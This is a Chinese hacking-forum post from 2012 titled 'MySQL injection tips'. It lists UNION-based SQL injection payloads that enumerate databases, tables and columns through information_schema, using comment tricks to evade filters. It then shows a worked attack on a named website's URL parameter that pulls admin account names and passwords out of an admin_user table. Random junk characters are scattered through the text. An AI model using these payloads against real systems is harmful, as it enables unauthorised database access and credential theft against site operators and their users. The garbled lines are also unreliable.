中国网络渗透测试联盟

标题: mysql注入技巧 [打印本页]

作者: admin    时间: 2012-9-13 16:29
标题: mysql注入技巧
查库
* ~4 z7 M0 |; ^& E$ r0 Y
5 t+ @) I7 I( sid=-1 union select 1,..,SCHEMA_NAME,n  from/**/information_schema.SCHEMATA limit 1,1/*6 Z; R) q, a2 n2 x* h" N' y
* i; W# u* ]5 R  D( V* \' z  s
查表" X8 z/ c* s+ G$ r$ z. Z/ y
# M3 U9 ?2 z: ?
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1, V; [* C8 F8 ^

- c: J. s. D9 d查段
5 C/ x% _2 l" c/ ?
9 F; l, D& o" Yid=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
8 f; j% S! _4 _6 E. z* a5 B1 Q8 X  _8 \* a0 v& u7 J) _5 u
. Y# y3 R1 `3 a  d
mysql5高级注入方法暴表" p( w; k) C+ |

3 U' o6 n4 t0 @; y; Y' l; m7 c- X例子如下:/ p& {1 t3 w/ i# e$ q' q
; F6 z; A/ O( l* l3 `; i# u
1.爆表
2 i( I( n, \# b# G, s( Khttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*    (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)7 A3 t% R+ O: W& Z
这样爆到第4个时出现了admin_user表。
& N+ D5 C  h0 a6 i. i; c: k: L! w/ p0 h6 }
2.暴字段
, G/ O5 {5 }" f$ y4 G& }6 lhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*
: o9 X* N7 m! `+ D5 G2 y! H/ _8 Y# S
1 x* R4 j3 v* V4 ~
$ _' d! S! K, B0 T' q! J/ l. i% r3.爆密码% h# a. j5 ~- X- {
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* & t4 A- [6 E3 e2 l0 r

4 m2 x+ ^  e0 M" }" h/ E
- q0 }! q1 b$ ^& L& p




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2